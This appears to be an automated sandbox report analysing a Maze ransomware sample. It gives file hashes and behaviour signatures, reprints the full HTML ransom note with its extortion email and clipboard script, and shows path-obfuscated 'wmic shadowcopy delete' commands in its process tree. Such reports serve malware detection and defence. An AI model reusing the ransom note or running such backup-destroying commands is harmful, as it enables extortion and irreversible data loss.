Analysis
-
max time kernel
153s -
max time network
139s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
16-02-2022 23:10
General
-
Target
138e4c4e33a36e147d296a4d9695e3adf1a33611d97e0365dd3884be1c26c60e.exe
-
Size
449KB
-
MD5
8107f019d9d6fe62a49ce7ad40fa1f7b
-
SHA1
8bf319aa49589558f0ff482bff805676a7fed109
-
SHA256
138e4c4e33a36e147d296a4d9695e3adf1a33611d97e0365dd3884be1c26c60e
-
SHA512
7991048cbc053d71e2d92980e516426d04ef55617e04bd00b568c2e7ebd155211dfd8af8f492614cbe056ade6fb81365dd8a1f5cc94e3dbecbd10edb60a67a61
Score
10/10
Malware Config
Extracted
Path
C:\DECRYPT-FILES.html
Ransom Note
<html>
<head>
<script>
function CopyToClipboard(containerid) {
if (document.selection) {
var range = document.body.createTextRange();
range.moveToElementText(document.getElementById(containerid));
range.select().createTextRange();
document.execCommand("copy");
} else if (window.getSelection) {
var range = document.createRange();
range.selectNode(document.getElementById(containerid));
window.getSelection().addRange(range);
document.execCommand("copy");
alert("Base64 copied into the clipboard!")
}
}
</script>
<style>
html{ margin:0; padding:0; width:100%; height:100%; }
body { background: #000080; color: #ececec; font-family: Consolas };
.tooltip {
position: relative;
display: inline-block;
border-bottom: 1px dotted black;
}
.tooltip .tooltiptext {
visibility: hidden;
width: 120px;
background-color: #555;
color: #fff;
text-align: center;
border-radius: 6px;
padding: 5px 0;
position: absolute;
z-index: 1;
bottom: 125%;
left: 50%;
margin-left: -60px;
opacity: 0;
transition: opacity 0.3s;
}
.tooltip .tooltiptext::after {
content: "";
position: absolute;
top: 100%;
left: 50%;
margin-left: -5px;
border-width: 5px;
border-style: solid;
border-color: #555 transparent transparent transparent;
}
.tooltip:hover .tooltiptext {
visibility: visible;
opacity: 1;
}
p#base64{
-ms-word-break: break-all;
word-break: break-all;
-webkit-hyphens: auto;
-moz-hyphens: auto;
-ms-hyphens: auto;
hyphens: auto;
}
p#base64:hover{
cursor: hand;
}
</style>
</head>
<body>
<table style="position: absolute;" width="100%">
<tr>
<td style="width: 25%;">
<span class="left" style="font-size: 14px; font-weight: bold">CODE:
<br>------
<br>00000 00000
<br>00000 00000
<br>00000 00000
<br>00000 00000
<br>00000 00000
<br>00000 00000
<br>00000 00000
<br>00000 00000
</span>
</td>
<td style="width: 50%;">
<div style="text-align: center; font-size: 20px;">
<p><s>0010 SYSTEM FAILURE 0010</s></p>
<p>*********************************************************************************************************************</p>
<p>Attention! Your documents, photos, databases, and other important files have been encrypted!</p>
<p>*********************************************************************************************************************</p>
<br>
</div>
<div style="text-align: center; font-size: 18px;">
<p>The only way to decrypt your files, is to buy the private key from us.</p>
<p>You can decrypt one of your files for free, as a proof that we have the method to decrypt the rest of your data.</p>
<p>In order to receive the private key contact us via email: <br> <b>[email protected]</b> </p>
<p>Remember to hurry up, as your email address may not be avaliable for very long.<br>Buying the key immediatly will guarantee that 100% of your files will be restored.</p>
<p>Below you will see a big base64 blob, you will need to email us and copy this blob to us.<br>you can click on it, and it will be copied into the clipboard.</p>
<p>If you have troubles copying it, just send us the file you are currently reading, as an attachment.</p>
<br>
<p>Base64: </p>
</div><div style="text-align: center; font-size: 12px;"><p id="base64" onclick="return CopyToClipboard('base64')" class="tooltip">sNHfVguSoqtnuxQRBotDG8UfFMYiuquywo6LIKWNpWg0+Ol7S75xyjHFMBC2ZM2cu6IIETv9tFuXlz9PPHoOwPp2sytPdXV/VP2rww0N2lYzWCO0Bi+8kEYhHAlja5zKvu0BADP/T9y1p72aqFwHtjDv2hJY667U5NcnN88cPNBe/Euty1i7TwKCDJ3vNbF3ZYdzrO6HCoyeU/pGyRTWmc3hAyxjdG/klcxzCQlnhNJ+dd9Ctf9TRz4pLLkZeHutUZasAc+Psd95IHC7KvN2U7407rtzbasjUp0JEcF1Ggc9gdP0sBu2M9PYdSabuu8LAbyb/mMaZjGFF/qFn1Ihd93egNXXRhjxfbyFcVxN2bUlcdpFIYQmzdDgScTKKtRjcRSMiLkDmk/FHhRHIJpG6SIjafSbJtk2Qd37qU1OG2srA8i2DyS8thE1x24zmZx0uLCRQsnHJepPFPqCkLVuvIb4NlZudr6P8ojsE1jd0pNt8mjfmfTW8I7FVvoUzLBFJTWrTgmxVIZAJa09J3A4pOVfMjEUW2tyJDBbEj8/EFMo+T83p3QZPsb74yXqu+dUWksmi772bXnIiwbyrD7DsMQxNfvfvrKtO1UDZ5v6nJlPQ+JpwJ1iiXYgWS5aqNPD7YvSmAlPl50lefPYCJdKNn8l5aD9ZCqOijN4dYQgR100+UySvhg9nc7kr8UgC/7sL1pRaGBOqk7ZgCmcqhTUUJMahpGP6TU6Vl34S2G/KOf7dKUthYnrtO3hwBGTc2g0qhpGiQjaydpjJIJCS01etabRKIF0Msn3Z8XVYCAvIp7G7CUE7SjgzRZs0P7EFwfL6GWMVG0mfwjYgwJNlIMd3aTf0yBcISTh5iODyJlhtdw7XpcdPAZvJ+JElDBu+atNFsEiJOkR+VRWZhcBasIr9RZ9alsesUb0QIRH3UpZzm1c6l1jjMGdsFiZwPChzK1UC1ndLCs5V3gbGXSaLWtfEYoNaBmBQaycAuWvj3FUsOdxjyTV+x2p6r3NPmBUPhhjzyILZ9/OjAyOAxdIS5rQ7qVJVx0fXJrsGFmLsVLEKDwTPzHJmtr1B9Epu82qvJWAaseUqNvX7WCgTrDuiUF3AVBfoV+ZnVmlEt8OwBLqDxVed1cN05/3shg4DwkgGM0J2krc99BFP9N5BSLJm5nJbGEBAR+Z1Ema2aZh9VLjvXnB5BF2tsbUiu5E0AOqCcF6jAyLXzWSKmdsP7cENrra17gJanvBWC7n6o24nJFUXxDiu6cEDHEwrgpAKmUQBG1xZYKOAI1jBNSFRptdkAMSSO85n6YvPhJZJvoZD9uqsMv9EiStIbWv42bA6AA0UDiMycv/jk+BQZiDEnVVIGRgucmFXHWCNf6ZI7lDYmuXxhB2op8SsWF8XmO5z02I475ATdFRtfqajUJGLsf78F8Ri2CkpOgWbHRny9QC5oBUtIBwPV+1gG8ZbRS8ZXBTsixGsA7COgjqN8fi80160QWIa4cZhAvUZI79RU3aDzqi4DRP2Ko/qV+R7sfG0THTHBBwOnzQnEbkjXAr/dXfqi4sgVsmn1GA/EJ2YFznSpTltFzfnsacE4YiQkvCeyRRFHb3xvcNPyHEAaQ/RdbgpWLuPGEqK1Lbq5i9MrStKABgxkyS3KA3qxPJBDv2BAyarYFaYu9XC/Qkf/Jr+ci/NOapZiewQbq4BvZjWQudpb1kkVdbuvV511hOW1Sz0xT6pYCuXJT2VK158lcCmO/YcFj82bUZSY2oV3JSM8DIPo0Et/WSDeMk1y1XGCZd4Bz1Zpq7p10ZKvrmnhR9omHDkXdlpCEn75V+SPVraCc0qr6F5GMEaSL2pl8KhoZWdUHk8GNEL333zwmtgos0UgxiFHcp9ai8Q573byeQspUgMkx9Ca7mHTo+jZqyNm8scqbSJh7yUWzj4PypzoLRkPId0FredMVlEvrQiPLzUgBe1+viR1PrwmhCB7yP+iq6hb8IdN+QeXVLg9d2q7uc6HuHpLtUEqSwdY/L+hmLaKOGv77F626mbnlaXaPqySvhyIMRtCLq1EKvvRHxIbhM6SBJJGomIactAz6KyAjzJns0VpPT+Hv1bGcpW1N3aNx5MluAzKyrCwseYCEQY/4vR8IfopKMeayy4zomUTycCxr+x/brLawI5+u3A/MS4ZfFwszfu3Z7ew4OoydyvLUWv5aIigXcaRXU5XyjiyNieW+iWRntffAveudeg/OsXO7h8P6r3d78emQGFgoiOAA5ADIAZQAwADkAOQBjAGMAYwA0ADAANgBiAGUAMAAAABCAYBoMQQBkAG0AaQBuAAAAIhJWAFEAVgBWAE8AQQBKAEsAAAAqDG4AbwBuAGUAfAAAADImVwBpAG4AZABvAHcAcwAgADcAIABVAGwAdABpAG0AYQB0AGUAAABCNnwAQwBfAEYAXwAyADAANAA3ADkALwAyADYAMQA4ADQAMQB8AEQAXwBVAF8AMAAvADAAfAAAAEgAUEBYiQhgiQhoiQhwvtjYe3gBgAEBigEIMC45Lm9mZmw=<span class="tooltiptext">Click here to copy</span></p></div></td><td style="width: 25%; text-align: right;"><span class="right" style="font-size: 14px; font-weight: bold">IMMINENT SHUTDOWN:<br>------<br>00000 00000 0 00<br>00000 00000 0 00<br>00000 00000 0 00<br>00000 00000 0 00<br>00000 00000 0 00<br>00000 00000 0 00<br>00000 00000 0 00<br>00000 00000 0 00</span></td></tr></table></body></html>
Emails
<b>[email protected]</b>
Signatures
-
Maze
Ransomware family also known as ChaCha.
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies extensions of user files 4 IoCs
Ransomware generally changes the extension on encrypted files.
-
Drops startup file 2 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 8 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\138e4c4e33a36e147d296a4d9695e3adf1a33611d97e0365dd3884be1c26c60e.exe"C:\Users\Admin\AppData\Local\Temp\138e4c4e33a36e147d296a4d9695e3adf1a33611d97e0365dd3884be1c26c60e.exe"1⤵
- Modifies extensions of user files
- Drops startup file
- Sets desktop wallpaper using registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wbem\wmic.exe"C:\dgmkk\p\vs\..\..\..\Windows\bbstf\u\..\..\system32\xwbph\..\wbem\do\gfuqx\..\..\wmic.exe" shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\wbem\wmic.exe"C:\wx\p\mapyg\..\..\..\Windows\lvrnw\..\system32\o\qmhci\..\..\wbem\t\n\..\..\wmic.exe" shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
8KB
-
Filesize
356KB
-
Filesize
356KB
-
Filesize
356KB